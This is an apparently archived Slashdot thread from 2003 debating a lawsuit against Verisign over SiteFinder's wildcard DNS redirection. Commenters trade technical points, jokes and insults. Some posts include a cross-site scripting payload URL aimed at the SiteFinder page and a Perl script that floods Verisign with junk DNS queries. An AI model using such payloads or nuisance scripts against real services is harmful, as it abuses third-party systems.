Re:Right...

Errr, that should be "but our calculations were right!

Astronomers are definitely much to smart to speak the wrong homophone.

Re:Right...

You had an inkling of intelligence until you used 'to' instead of 'too'.

Good day.

Re:Right...

Well, ya gotta keep people on there toes.

I've double spellchecked this one, and there's not a single error. It's the perfect comment, just like Isabel was the perfect storm (before it was downgraded to a category one or to). It's truly perfect...aye, not an single error.

Good day.

Re:Right...

There were no less than four errors that time. You are an idiot and deserve to burn in Hell. Go away troll. You don't even have the courage to post with your own user name.

Mod -1 "fucking moron"

Re:Right...

fuck you

grow a sense of humor where your other ass is

Florida?!?!

Can they find anyone who'll understand the technical aspects of the lawsuit?

But really, they should sue in Silicon Valley, where you're likely to get at least one PhD on the jury, and several technophiles (geeks) who will understand what Verisign has done.

Why not pull out all the stops? Go CLASS ACTION

[dankdirk77]

You know, have one of those Trial Lawyers sue them for $100,000,000 and then give everyone in the U.S. who's been 'squatted a $5 coupon. Granted, it would only serve to hurt Verisign.

BTW, has someone made a comprehensive list of all the tech companies pulling bullsh*t nowa days? There's a lot of people I need to remember I'm pissed at.

Null space needs to remain null

[mabu]

First off, the idea that Verisign can appropriate unregistered domains represents a huge conflict of interest with its management of the TLDs. Nobody should be able to reassign IPs for non-registered domains. This undermines the whole system, which has facilities to address this situation.

The fact that ICANN didn't block this move is further evidence than this organization is totally useless and political.

Along the same vein, I disagree with MS's misleading implementation of the IP-not-found error page to redirect users to their proprietary search engine.

The Internet community should rally against any entity that seeks to appropriate undefined address space for their own gain.

If Verisign is allowed to do this, what we're likely to see is each major ISP and browser manufacturer follow suit and hijack undefined space to promote their own systems.

Imagine if you dialed a wrong number on the telephone and you got an advertisement for the phone company. What if local broadcasters bombarded all the unused frequency spectrum with their own promotions.

This has less to do with Verisign than it does to protect the sanctity of null space.

It makes me wonder if someone has a patent on silence yet?

Re:Null space needs to remain null

[kfg]

"It makes me wonder if someone has a patent on silence yet?"

No, there's too much prior art, but John Cage has a copyright on 4'33" of it.

KFG

Re:Null space needs to remain null

[Elwood+P+Dowd]

Four feet and thirtythree inches of silence?

Damn, that'd deep.

Re:Null space needs to remain null

[mickwd]

And they've tried to take action over it for copyright infringement, believe it or not.

Re:Null space needs to remain null

[azuretek]

In IE the option for their search engine can be turned off (not hard to do in fact) verisign dosent give you an option, in fact it causes problems of all kinds... anyway, I wonder how long till some "hacker" hijacks the site and runs that active X exploit that I'm sure thousands havent patched (another big PR problem for M$ probably)...

Re:Null space needs to remain null

Quick, someone patent 4'32" and 4'34" of silence. That way, if Cage ever plays over or under 4'33" by a second anywhere else, you can sue him for copyright infringement. :0)

BIND patch available to block site finder

The Internet Software Consortium (ICS), which makes the Berkeley Internet Name Domain (BIND) software (runs most domain name servers) has already released a patch to block "site finder":
http://www.isc.org/products/BIND/delegation-only.h tml
I just still can't believe Verisign thought they could get away with this.

Re:BIND patch available to block site finder

[StarHeart]

There is a bug in this patch. There is already talk of releasing another patch.

The bug is that NS lookups for non-cached domains fails.

nslookup
set type=ns
geek.com
Fails if not already cached by named

nslookup
geek.com
set type=ns
geek.com
Always works

I dunno about that.

[TheSHAD0W]

They get it for free, but they also lose it any time someone wants to take it away, for any specific domain. I personally don't like it, but I don't know if this particular avenue of attack will succeed.

Re:I dunno about that.

[Agent+R]

This litigation might work since Popular Enterprises still has to *buy* the expired domain first. With Verisign doing this for free they get a big leg-up on it. Either way I hope Verisign loses for this blatant RFC violation. This is fast becoming as something more than an annoyance.

Re:I dunno about that.

"They get it for free"

No, someone has to buy it from them. Who ends up with that money?

Re:I dunno about that.

[profplump]

Except that's not true -- if Verisign doesn't want you to have a domain you don't get it, period. Their ToS, and as a result, the ToS of all DNS registrars allow them to deny registrations at will.

Now if they actually did this regularly they'd get sued, but not wanting is hardly the same as not being capable.

Re:I dunno about that.

[TALlama]

>They get it for free, but they also lose it any time
>someone wants to take it away, for any specific domain.

Really?

Well, I'm off to buy verisign.com, then!

Re:I dunno about that.

[poot_rootbeer]

They get it for free, but they also lose it any time someone wants to take it away, for any specific domain.

No, they lose it any time someone BUYS it. And who could someone buy it FROM? Verisign.

Note to self

[curtlewis]

Companies to boycott:

SCO (need you ask?)
Verisign (screwed by em long before this)
SBC (for not blocking Verisign)
Microsoft (ya just gotta)
RIAA (You don't sue your customers. Solve the problem!)
Sun (for the abomination called Java)
Gray Davis (because he DOES suck)
Cruz Bustamante (Don't give him a CHANCE to suck)

Note to self:
Get more RAM for Notes to self

Re:Note to self

Companies to boycott:

...

Gray Davis (because he DOES suck)
Cruz Bustamante (Don't give him a CHANCE to suck)

Uhhhh... they're not companies. But hey, feel free to boycott them all you want.

Re:Note to self

[curtlewis]

Tehcnically no, they aren't.

But considering the size of their team, the way they manage large sums of money with questionable accounting, etc, they operate like a business.

In other news...

[mcpkaaos]

Son of Sam sues Ted Bundy for "copping his gig".

Can't we just do to the cyber-squatters the same thing we did to Bundy? Can we do it to whomever coined the term "cyber-squatter"?

link with more info...

More info can be found here:

http://www.popluarenterpirses.com/

Blacklist Verisign's IPs

Does anyone have a list of IP's / IP blocks that Verisign owns? I am going to set up my firewall to not allow any traffic to or from them.

All of them.

I suggest you do the same if you feel strongly about this.

Verisign, so you want every non-existent domain to resolve to your IPs'? I'm going to give you the opposite. Not only will nothing go to your SiteFinder service, but all your *real* domains like verisign.com will be cut off too.

Its time to go.

Re:Blacklist Verisign's IPs

[wanion]

You're going to blacklist all the gTLD servers? You really don't like DNS, do you?

Re:Blacklist Verisign's IPs

[character+sequence]

Does anyone have a list of IP's / IP blocks that Verisign owns? I am going to set up my firewall to not allow any traffic to or from them.

As somebody else pointed out, you really don't want to block access to their DNS servers. On the other hand, a few of their netblocks might be worth blocking (e.g. the one that sitefinder is on). You can get the block info, for example, as follows:

$ nslookup not_a_domain.com

Non-authoritative answer:
Name: not_a_domain.com
Address: 64.94.110.11

$ whois -h whois.arin.net 64.94.110.11
Internap Network Services PNAP-05-2000 (NET-64-94-0-0-1)
64.94.0.0 - 64.95.255.255
VeriSign/Network Solutions PNAP-LAX-VERISI-RM-13 (NET-64-94-110-0-1)
64.94.110.0 - 64.94.110.255

So the 64.94.110/24 block is Verisign's. Interestingly, "nslookup sitefinder.verisign.com" reports a different IP address, 12.158.80.10. According to ARIN, this is on Verisign's netblock 12.158.80/24.

Another block you might be interested in: www.verisign.com is on 65.205.248.0 - 65.205.251.255 (65.205.248/22, I guess). Don't forget to update your firewall rules when these change :-)

Funny Stuff

[NeoGeo64]

http://sitefinder.verisign.com/lpc?url=www.microso ft.com&host=www.microsoft.com

"We didn't find www.microsoft.com"
"There is no web site at this address."

Only in a perfect world...

Re:Funny Stuff

[kdsolutions]

http://sitefinder.verisign.com/lpc?url=our%20dick& host=our%20dick

We couldn't find: "our dick"

Re:Funny Stuff

[zummit]

http://sitefinder.verisign.com/lpc?url=www.verisig n.com&host=www.verisign.com

We didn't find: "www.verisign.com" There is no Web site at this address.

MOD Parent Up

[Wylie+Coyote]

Exactly!

sitefinder can't find verisignsucks.com

[consumer]

Has anyone else noticed this? It returns a sitefinder page immediately for blahblahsucks.com, but nada for verisignsucks.com.

Re:sitefinder can't find verisignsucks.com

[Artifex]

Has anyone else noticed this? It returns a sitefinder page immediately for blahblahsucks.com, but nada for verisignsucks.com.

MSN's search can't find it, either.
But, you know what?

Can't reach the DNS servers for it either, NS1.IUNIVERSE.CC and NS2.IUNIVERSE.CC.

So... did you do any research before posting?

Re:sitefinder can't find verisignsucks.com

[shfted!]

However, it does find verisignsucksllamaballs.com. This is interesting.

Re:sitefinder can't find verisignsucks.com

[splorp_uk]

That's because verisignsucks.com has been registered by someone

Re:sitefinder can't find verisignsucks.com

it be registered, and not recently. ;)

Record expires on 19-Mar-2004.
Record created on 10-May-2002.
Database last updated on 19-Sep-2003 17:00:14 EDT.

Re:sitefinder can't find verisignsucks.com

[mummers]

Interestingly, verisignsucksmyballs as well.

According to this...

[TitaniumFox]

[Full-Disclosure Mail Link]

Verisign has hired Omniture to collect info on what people misspell. While the website may seem clean and useful, it may not be, depending on what your take on privacy is.

Re:According to this...

[kdsolutions]

good, good, good... everybody, we need to write an app that will connect to fuckverisignuptheasstheylikeit.com and fuckverisignuptheasstheylikeit.net once a minute (cross platform and opensource - maybe they'll be nice and run it on a few of thier own servers?).

If half of /. connecting once a minute should have that as the most visited mistyped url out there. That, and I'm sure they'd love to see that on the top of their list!

Oh, and as an added feature, have it randomly modify one letter in the .net address and use the .com address as-is, and vice-versa, every other connect. That should FILL thier list with it. They'll get the point when the Omniture rep says "Sorry guys, here's a full refund, but I don't think you want to see this list" about 2 seconds after he says "OH FUCK!" in thier office!

Re:According to this...

If you look around that thread, someone has already shown that they've stopped resolving verisignsucks.com

Re:According to this...

Yeah.

#dig verisignsucks.com

yielded nothing.

#dig verisignsucksmonkeynuts.com returned the sitefinder IP

Re:According to this...

[Reziac]

Yep... exactly what I and a few others have said we suspect: Verisign plans to see what people most commonly mistype, then squat on those domains.

Otherwise, why would they even care what typoes folks make?

Re:According to this...

[NexusJedi]

#!/usr/bin/perl
use warnings;
use strict;

$| = 1;

use Net::DNS;
use Getopt::Std;

our $opt_q = 0;
getopts('q');

my $res = Net::DNS::Resolver->new(
# These are RoadRunner's name servers. Change to yours.
nameservers => [qw(24.95.227.34 24.95.227.35)],
);

my @bases = qw(
fuckverisignuptheasstheylikeit
);
my @tlds = qw(
net
com
);

while(1) {
foreach my $base (@bases) {
foreach my $tld (@tlds) {
my $host = sprintf "$base\_%04d.$tld", int(rand(10000));
my $q = $res->search($host);
unless($opt_q) {
print "$host: ", $q
? ($q->answer)[0]->address
: "Query failed (" . $res->errorstring . ")",
"\n";
}
}
}
sleep 60;
}

I don't agree

[howhardcanitbetocrea]

I notice at the bottom of the sitefinder service page it has a "terms of service" link. I hereby declare that I do not agree to those terms of service. Now what? Do I stop getting redirected to that page?

Re:I don't agree

Maybe some web monkey will parse the logs.

Terms of Service

I'm having a hard time picking a favorite section. It could be section 10 - Sole remedy: don't use the service. Heh. Or section 12 - Indemnity: by using the service you indemnify Verisign for any damage that use of the service may cause you. Or section 14 - agreement to be bound by terms of use.

Shouldn't making baseless legal threats or trying to convince people that they are bound by a valueless contract be a crime - maybe a minor felony, but the US bar might consider disbaring lawyers who are involved in such shady goings on.

Re:I don't agree

[thomas_klopf]

I think these terms-of-service by themselves could definitely be a basis for a law-suit...

Like, the terms of service effectively say if I try to access a non-existant .com, etc. domain, I'm suddenly bound to a contract? WHAT THE !@#!@? I'm sure any competant judge would at the very least not allow Verisign to put any terms on such a thing.

Network Solutions' "NextRegistrationRights"?

Is this service legal?
I've been getting lots of Network Solutions email/spam with this "service" mentioned.
For some reason, it just kinda pisses me off....
It's like "Wow! We can register to legally steal someone's domain names! How wonderful!"
I never could figure out how Network Solutions claims to own all our domain names, yet at the same time big companies can sue and get back their domain names...and now this stupid service!

Here's the ad:

Introducing Next Registration Rights(SM)
from Network Solutions, the first service
that automatically grants you the next
registration for a .com or .net domain name
you want if it becomes available during your
subscription term. This new service is
scheduled to be available in October,
but we are accepting pre-orders now.

Get the domain name you want
Protect the names you have
Only one pre-order per domain name

Pre-order today at
www.NextRegistrationRights.com.

Another possible legal angle

Consider giving SiteFinder urls like "Persons-Name-MD.com". Note there's a "health" link on the resulting page.

In many places it's a serious offense to pose as a physician.

Furthermore, note that the SiteFinder page might very well suggest other physicians' web sites. Doing medical referrals has its own set of legal issues.

Do the patriotic thing!

Push your software makers to push for DNS Security Extentions or DNSSEC specifications!

Your computer will thank you

Copy of the Lawsuit and More Details

[dmehus]

Full details of the lawsuit are available in this press release:
home.businesswire.com/portal/site/google/index.jsp ?epi-content=GENERIC&newsId=20030918005730&newsLan g=en&beanID=478837757&viewID=news_view

Copy of lawsuit:
search.netster.com/about/lawsuit.asp

Sorry, I forgot to include these links in my submission. Post away!

Cheers,
Doug

Re:Copy of the Lawsuit and More Details

[muldrake]

Thanks. I missed this when I searched the thread before posting a stupid question as to whether anyone had a copy of the suit.

I'm going to keep track of any particularly interesting filings in this case, unless Netster is archiving them all. For the present, I'll put them at this entry on my blog, along with other PACER material. While they claim to have filed this, it hasn't yet appeared on the PACER site for the Middle District of Florida.

cyber censors

[wadiwood]

Having trouble figuring out why site finder is controversial, they don't outline that at their web site...

but I did try

amp

somewhere in the middle is the behemoth financial company

slashdot

nothing

sun biometrics

some stuff about sun as in java

and then the

sun biometrics international

the fraudulent company designed to part fools from their money.

Figures.

Dear VeriSign, Thanks for the spam.

[AntiOrganic]

I truly thank VeriSign's lovely spam service.

Someone a few months ago mentioned to me that Sendmail has a feature where, upon receiving mail, it will check the domain of the sender. If the domain does not exist, it has a forged From: header and is obviously spam.

Thanks to Verisign's efforts to piss me off, every DNS query on a nonexistant .com domain or .net domain is returning an SOA record and none of these messages are being blocked.

Since this "service" has been implemented, I've gone from 7-8 spams a day to 30-35.

Thanks a lot, assholes.

Re:Dear VeriSign, Thanks for the spam.

Well you can always tell verisign your address. Maybe you'll get over 100/day this way.

Re:Dear VeriSign, Thanks for the spam.

[Smallpond]

So do what I did:

To: abuse@verisign.com
From:
Dear DNS administrators,

The mail server I am administering is experiencing a problem with spam. I have
not getten check_rcpt rule checks in the .com TLD since 9/15. All domains are
now returning an A record, even though they are not registered domains. Please
correct this error in your servers.

Thank you,

Re:Dear VeriSign, Thanks for the spam.

[novarese]

If the domain does not exist, it has a forged From: header and is obviously spam.

NOT TRUE. This filter causes all sorts of problems for me. I have scripts running on client machines that send email when certain conditions are met. The customer's machine is on a private network behind a firewall. The mail appears to come from user@machine.domain.company.com - but there is no externally visible MX record for domain.company.com or anything in that subzone, so these messages all appear to be forged by this filter's reasoning. My company (and my cell provider) both use this dumb filter and therefore I can't get these messages unless I forge the from: address to meet their arbitrary definition of legitimacy. To do so, btw, requires either root (and I certainly don't want these ksh scripts running with privledges) or adding the user to sendmail's trusted user list - both pains in the ass.

This filter is completely ineffective anyway - if a spammer is forging his from: header, how hard is it to forge it to appear to be from a legitimate address? This filter actually *encourages* even more annoying behavior such as joe-jobbing (where spammers use innocent victims' real addresses as the from: address, generating tons of "user unknown" messages from AOL onto unsuspecting people).

Re:Dear VeriSign, Thanks for the spam.

[guardian-ct]

Three things:

1) Any "good" domain-based spam filter checks for the existence of the suffixed DN as well. So for a domain of "machineDNEoutsideWall.domain.company.com", it looks for that, and "domain.company.com", and "company.com". If any of those exist, it should pass the mail on to the rest of the mail filters, possibly increasing any "spammish" score if it had to remove anything.

2) It used to be harder to guess "good" domain names than it is now. One thing that sometimes happens with (stupider) spammers is that the machine they were using to send email gets kicked off DNS by the ISP. So, while it might have been valid for the first few messages, it stops being valid later. It doesn't anymore though, since verisign matches everything that does not exist.

3) Verisign can't seem to come up with any good matches for " Verisign" in its search box.

Re:Dear VeriSign, Thanks for the spam.

[Smallpond]

Any "good" domain-based spam filter checks for the existence of the suffixed DN as well.

Not true. This would mean I should accept mail from "spammer.com" if ".com" exists? The sender is doing the wrong thing. They should not be sending mail from machine1.domain.com where machine1 is behind a firewall. In sendmail (and any other mail agent) it is trivial to rewrite the header to say the mail came from domain.com. After all, I can't reply to machine1.domain.com if it doesn't exist.

Re:Dear VeriSign, Thanks for the spam.

[guardian-ct]

Thanks for misreading... Did I ever say "Check for '.com'"? No. The furthest back I went was to company.com. I'm thinking of checking more than just the possibly forged from address. "Received:" headers for example.

A normal From address doesn't include "@machine1.domain.com" unless machine1 is actually accessible as a mail server from the outside. The only place you'd likely see machine1.domain.com is in the Received headers, going out to the company's mail server, then the outside world if necessary.

If you check From headers, you should be able to easily extend that to checking Received headers.

This too: Not every company has the money or the reason to afford IT support for whom properly changing a configuration option of a server is trivial.

Re:Dear VeriSign, Thanks for the spam.

Only 30-35, I wish I could trade you mail boxes, I am well past some 500 and the day isn't out. Mind you - alot of it is trojan-spam from virus infected PCs that ISPs are doing little about.

The Intenet will not end for the load, but might be realed back some as people loose patience over this.

Thanks Verisign for this... they may be the straw that breaks me. If ICANN can't get some sense into Verisign, then we need to get a new TLD for .com and .net.

And ICANN does NOT really control the .com and .ent. Anyone can set one p. The trick is to be credible.

[ot] Is Newdotnet worse?

[vonsneerderhooten]

It seems to me that when it comes to disrupting the order of the internet(the order that you and i fight to retain), there's a company called newdotnet which turns people's computers into dns servers which resolve TLD's such as .shop; .yo_momma; .etc....

I see this as much more damaging to the infrastructure of the internet than the hijacking of a couple of legitimate domain names.

Dont get me wrong, verisign is definately in the wrong here and my intent was not to downplay this.

Verisign=Evil

Verisign=Evil

Verisign=Evil

Terms of Us

[flakac]

Never thought it'd happen, but I'm rooting for the squatter... if there's a group worse than spammers and domain squatters, it's Verisign. Just on a whim, I typed in a non-existent domain name, and sure enough, found myself on their page. Take a look at the "Terms of Use". Sections 2 and 14 are really telling:

2. You may have accessed the VeriSign Service(s) by initiating a query to our DNS resolution service for a nonexistent domain name.
14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference.

I'm not sure how the came up with the fact that I, the end user, made a query to their DNS server. In fact, I did not. My ISP may be using their services, but I personally have no legal relationship with Verisign whatsoever. My ISP may be using their services, but that in no way establishes a relationship between myself and Verisign. IMO, unless you're querying Verisign directly, their terms of use cannot possibly apply -- which means that they apply to almost noone. I would challenge them to show any log that shows my IP address accessing their service. If they can't, then I did not in fact access their service.

And what's worse is the implication that I can bound by "Terms of Use" that I have never seen, based on the assumption that I made the query, when in fact the query mas made to a DNS server at my ISP (and again, I don't really care how my ISP handles that request as long as it sends me the requested info.

Verisign should be forced to pay the ICANN $$$

[flyboy974]

Verisign, in essence, has registered every domain and is providing DNS services for those domains. They should be forced to pay the standard registration fee to ICANN for every domain which was served during this outrage.

If I were to make it so that every unique domain on the internet went to my server, I would have to pay a Google's worth of cash (well, maybe some pun intended. But, long live Google! The best search engine and popup blocked!).

Anybody up for making a wget script to fetch a bad host with a 32 bit integer on the end until the end of time? I'm a Software Architect but feel like playing script kiddie for a day. ;-)

Re:Is it possible Verisign's move will be irreleva

[Baki]

Actually I think the BIND solution, to mark certain zones as "delegation only" is very elegant, and should have been implemented sooner or later anyways. Even without the current abuse it makes sense, and it hardly adds any complexity to the code.

Journalists should not write tech stories

[flakac]

From the article:

Typically, Internet users are shown a generic "404 -- cannot be found" page when a Web address does not exist.

Sooooo, if the web server can't be found, who's sending the HTTP 404 response (which incidentally means that a file on a server doesn't exist...)?

Re:Journalists should not write tech stories

[ccoder]

Actually, by default MSN is used for most "not found" domains. I'm still waiting for Microsoft to SUE Verisign for stealing their business with (sic) unfair methods.

Re:Journalists should not write tech stories

[poot_rootbeer]

Could be that when the author talks about "web addresses", he means whether a URI exists, not whether a domain is registered.

http://www.slashdot.org/cowboyneal/cowboyneal/co wb oyneal/ is a "web address" that does not exist, and I get a 404 when I try to go there.

What that has to do with domain resolution, I can't answer.

Why could they accomplish surprise?

[fishbowl]

Why didn't this info leak before VS turned on the switch? That's the most surprising thing about the whole deal to me.

The backlash against VS should have started BEFORE they went through with this decision -- and that backlash should have been OVERWHELMING, as in, every sysadmin with DNS should have been complaining, ISP's should have been filing motions for restraining orders, and ICANN should have been ready to pull the gTLD contract once and for all.

Re:Why could they accomplish surprise?

[87C751]

Why didn't this info leak before VS turned on the switch? That's the most surprising thing about the whole deal to me.

Actually, they did.

Just some number

[OverlordQ]

Let's see just assuming plain alpha domains, with 26 letters, and the longest domain at what? 66 letters? so 26^66 = 2.444e+93 just for dot com.

Letters + Numbers = 1.3518e+104 Just for dot com, figuring $30 a pop for a domain, that's a nice $4.055e+105

comparison

[Jucius+Maximus]

The only thing I can say here is that Verisign seems to be in competiton with SCO for numerous titles:

- most hated company on the internet
- most stupid business moves
- most obvious 'shoot self in foot' maneuvre

I expect that slashdot would implode if SCO sued Verisign for this maneuvre. Do you cheer because one of them will lose? Or groan because one will win?

Re:comparison

[SMOC]

SCO could sue VeriSign about www.scocks.com

Here's hoping someone at SCO reads this.

Re:comparison

[Elwood+P+Dowd]

I expect that slashdot would implode if SCO sued Verisign for this maneuvre. Do you cheer because one of them will lose? Or groan because one will win?

Cheer, because both of them would be wasting money on a lawsuit.

Cry, if that lawsuit provided precedent for either of their parasitic business models.

Re:comparison

Or just sit there in shock, saying absolutely nothing at all....

Re:comparison

[kdsolutions]

Then they could certainly sue over http://September9,2003OpenLettertotheOpenSourceCom munityThemostcontroversialissueintheinformationtec hnologyindustrytodayistheongoingbattleoversoftware copyrightsandintellectualproperty.Thisbattleisbein gfoughtlargelybetweenvendorswhocreateandsellpropri etarysoftware,andtheOpenSourcecommunity.Mycompany, theSCOGroup,becameafocusofthiscontroversywhenwefil edalawsuitagainstIBMallegingthatSCO'sproprietaryUN IXcodehasbeenillegallycopiedintothefreeLinuxoperat ingsystem.Indoingthis,weangeredsomeintheOpenSource communitybypointingoutobviousintellectualpropertyp roblemsthatexistinthecurrentLinuxsoftwaredevelopme ntmodel.ThisdebateaboutOpenSourcesoftwareishealthy andbeneficial.Itofferslong-termbenefitstotheindust rybyaddressinganewbusinessmodelinadvanceofwide-sca leadoptionbycustomers.ButinthelastweekofAugust,two developmentsoccurredthatadverselyaffectthelong-ter mcredibilityoftheOpenSourcecommunity,withthegenera lpublicandwithcustomers.Thefirstdevelopmentfollowe danotherseriesofDenialofService(DoS)attacksonSCO,w hichtookplacetwoweeksago.Thesewerethesecondandthir dsuchattacksinfourmonthsandhavepreventedWebusersfr omaccessingourwebsiteanddoingbusinesswithSCO.There isnoquestionabouttheaffiliationoftheattacker-OpenS ourceleaderEricRaymondwasquotedassayingthathewasco ntactedbytheperpetratorandthat"he'soneofus."ToMr.R aymond'spartialcredit,heaskedtheattackertostop.How ever,hehasyettodisclosetheidentityoftheperpetrator sothatjusticecanbedone.NoonecantolerateDoSattacksa ndotherkindsofattacksinthisInformationAgeeconomyth atreliessoheavilyontheInternet.Mr.Raymondandtheent ireOpenSourcecommunityneedtoaggressivelyhelptheind ustrypolicethesetypesofcrimes.Iftheyfailtodosoitca stsashadowovertheentireOpenSourcemovementandraises questionsaboutwhetherOpenSourceisreadytotakeacentr alroleinbusinesscomputing.Wecannothaveasituationin whichcompaniesfeartheymaybenexttosuffercomputeratt acksiftheytakeabusinessorlegalpositionthatangersth eOpenSourcecommunity.Untiltheseillegalattacksarebr oughtundercontrol,enterprisecustomersandmainstrea

Re:comparison

[SMOC]

Too bad there's a 63 character cap on dns names, not to mention the illegal ' and " characters.

Re:comparison

[muldrake]

Do you cheer because one of them will lose? Or groan because one will win?

You cheer, because BOTH OF THEM WILL LOSE.

Re:comparison

[Elbow+Macaroni]

I would have to say that as far as companies I hate this company would have to be #1. So anyone that sues them is doing a public service if you ask me.

Re:comparison

Hang the fuckers high !

Re:comparison

[Reziac]

Experience bewilderment at the SCO-Verisign merger. ;)

Re:Terms of Use

[lloy0076]

Well,

I am having a merry merry-go-round with their support department. I think I've convinced them that they can't possibly bind me to their terms and conditions.

Basically I have said:

* No, I want the law in Australia to apply
* No, I want the right to a jury trial ...and then got the response:

"You can't opt out." ...to which I replied:

"I'm a law abiding citizen - you are asking me to do something which is illegal."

*hmmm*

They don't seem to understand the last bit.

Alexa

Alexa Page Ranking, another insidious tool, lists Verisign Pagefinder as the number one Website in new Hits, up 1360 % on the week

http://www.alexa.com/site/ds/movers_shakers

how long till they sue .museum?

[Alien+Conspiracy]

If .museum can do it, (for example http://this.is.not.a.museum) then why can't VeriSign?

Is there really a hard _legal_ difference between the 'custodianship' of .com and the 'ownership' of .museum? Or are we all just making false assumptions based on what we would like to believe?

Re:how long till they sue .museum?

[TCaM]

Following your .museum link one finds that this specialized domain though it does have a wildcard is being handled at least in a reasonably fair and straightforward manner. They appear to be trying to run .museum for the benefit of both museums and people who are looking for information on museums. Verisign is trying to run .com and .net for the benefit of verisign.

Do you truly not see the difference, or are you being intentionally obtuse?

Re:how long till they sue .museum?

[Alien+Conspiracy]

I am not aware of any law that says making a profit from your rightful property wrong.

My point is: does the .com domain belong to Verisign in the same sense that .museum belongs to that organisation?

Re:how long till they sue .museum?

[CrackHappy]

Absolutely not! .Com and .Net are not "owned" by anyone. Verisign is given the right to run the DNS services for these, and in exchange is making a killing!

This is simply an abuse of power.

If I'm wrong, someone point it out with some proof please.

Re:Is it possible Verisign's move will be irreleva

[derF024]

At what cost? Routers are working harder, code has been introduced into core servers that has no technical reason to exist, and an IP address, or possibly a sizeable range of IP addresses are now blacklisted worldwide.

Well, not really. Just that no A records can reliably point into those blocks now, since the "quick fix" that tons of people used just blocked a few subnets owned by verisign. Of course, verisign has bunches of subnets where they can point this thing, and that quick fix is going to expire pretty quickly. The not-so-quick fix for BIND (the one that only respects NS records from the root servers) is also easily evaded by VeriSign.

What network operators need to do is track down every last IP block that verisign owns and start broadcasting NULL routes for those blocks. Forget about spotty reception of a handful of IPs, Verisign would effectively be off the Internet. We'd lose root servers 'a' and 'j', but we'd gain an Internet without verisign, and I don't think anyone would argue that that was a bad thing. Explain to companies like this "If you pull rank on us, we take our toys (and your entire revenue stream) and go home."

Cross Site Scripting Bug

[umofomia]

http://www.";alert("fuckverisign");".com

The parent post may be modded as "Funny" but this actually is a pretty serious cross-site scripting bug introduced by Verisign. This and the hard-coded SMTP replies bug show how little thought Verisign put into the ramafications of their changes. Seriously... if you're gonna hijack the Internet, at least do it right!!

maybe it's time to give DNS back to the public?

[thomas_klopf]

When Verisign was given the authority to manage DNS for these TLDs, they were given this responsibility with the public trust.. The public trusted them NOT to do things exactly like this. You should do DNS, and that's it - nothing more, nothing less. In return, Verisign was given a source of income. I think that if Verisign continues in this way, it may be time to take back this thing entrusted to them. This has become yet another disaster in "privatization", and we should maybe consider moving this service back to the "public" sector (as much as it can be...).

Re:maybe it's time to give DNS back to the public?

The service never was "public". It's always been contracted to a private company.

What, you want to establish the US Department Of Internet Management and Control? And what about all the other countries in the world and their governments?

Re:maybe it's time to give DNS back to the public?

[thomas_klopf]

You're right about it never "really" being public, at least in it's current incarnation. However, the DNS system itself has it's origins in the public domain, and remains a public service. Moreover, it has always been "publicly" regulated in some way.

In another sense, there has always been some mechanism for (at least ostensibly) assuring that these companies managing DNS work in the public's best interest. Up until now, I think that DNS has mostly operated as it should (minus outages :) ) as a result of these mechanisms working properly.

If I'm correct, this current "mechanism" is supposed to be ICANN. However, it is obvious that ICANN is fairly impotent in its ability to work in the public interest. Regardless, it is Verisign who has stepped over the bounds of appropriate behaviour with this priviledge that has been given them.

As for establishing a "US Department Of Internet Management and Control", we already have one: ICANN. Also, you should remember that Verisign only handles the .com and .net TLD's (and others?) - other TLD's, such as .de, .ru, etc.. are handled by other authorities, most of which I think are regulated in some way.

Anyway, what I'm proposing at the very least is to increase the regulation of DNS so that whoever is given management responsibility does not do this very sort of thing. Also, there should be mechanisms for punishing violations, such as revoking a company's "charter" for doing DNS.

Interesting point...

[Morden]

One comment I've seen noted about the whole SiteFinder thing is that Verisign now resolves domains which are not available for registration, so it's possible they're profiting from something that they're not allowing others to purchase.

(Try www.a.com, www.b.com, etc ... you can't buy single character gTLDs)

script: a day at Verisign

[thomas_klopf]

Setting: Deep in the innards of Verisign's server rooms.. Characters: Mr. Barnacle: VP, Marketing, Verisign Mr. Patsy: some Admin for Versign Mr. Barnacle: "Yeah, so I was reading DNS For Dummies last night, and it said you can put this thingy called a wildcard in records.." Mr. Patsy: "Um, yeah, so?" Mr. Barnacle: "Couldn't we use this to redirect people to some other site?" Mr. Patsy: "Er, maybe...." Mr. Barnacle: "WOW.. Let's do that!" Mr. Patsy: "Ummm... I don't know..." Mr. Barnacle: "Do it!" Mr. Patsy: "Oh jeeez.. alright..."

not quite

Owning a domain that wasn't in DNS used to be called a "lame delegation".

Not quite. Owning a domain is a separate issue from DNS. Owning a domain means you have an entry in a domain registry. It does not mean you have a DNS entry. Owning a domain means you have paid your money and signed up and that you have the right to have your domain added to the DNS.

A lame delegation is something different. A lame delegation is when there are NS records that exist in the DNS, but they point to the address of a server that can't answer the queries for that domain. In contrast, if you have a domain that isn't in DNS, there is no NS record at all.

Re:not quite

[Animats]

If you register a domain, though, it normally gets delegated to the name servers you specify. That server need not have a record for the domain, though. That's the usual "lame delegation" case. Registered, but undelegated, domains are unusual, although Network Solutions seems to put domains into that state now and then.

Consider the possibility

[XNormal]

Consider the possibility that clueless users (i.e. 90% of Internet users) actually do like it.

Be afraid.

Re:Consider the possibility

[lrucker]

Consider the possibility that clueless users (i.e. 90% of Internet users) actually do like it.

Actually, if they're that clueless, odds are they're running IE with the default settings, so they get the MS search page when they mistype something.

Re:Consider the possibility

Not anymore they do. There is no mistyping, only Zuul.

Re:Consider the possibility

[hchaos]

Actually, if they're that clueless, odds are they're running IE with the default settings, so they get the MS search page when they mistype something.

Does this mean that MS now has an actionable case against Verisign (again)?

Re:Is it possible Verisign's move will be irreleva

[Zocalo]

It's certainly elegant, but try as I might, I can't think of a single genuine use for this other than what it is being used for; to protest against a registrar abusing its position. The best I've come up with is for a large ISP that delegates subdomains out to multiple DNS servers for its customers from a dedicated domain. Something like:

a*.ispname.com -> nsa.ispname.net
b*.ispname.com -> nsb.ispname.net

and so on, but *why* would they want to preclude the possibility of having their own hosts in the domain, or even doing what Verisign is doing in the one circumstance it's undeniably legitimate?

Lies in Verisign's terms of use

[XNormal]

2. NATURE OF THE VERISIGN SERVICES.
You may have accessed the VeriSign Service(s) by initiating a query to our DNS resolution service for a nonexistent domain name. We are unable to resolve such queries through the DNS resolution service.

They are, and they do. They resolve such queries to 64.94.110.11.

Piracy

[nut]

And somehow it seems strangely appropriate that today is international Talk Like A Pirate Day.

See also

Amiguity Corner

[pmc]

Similarly, there is nothing wrong with "vast minority of the group". Here what we reference is, for example, "the most significant or numerous part of that subgroup constituting the minority".

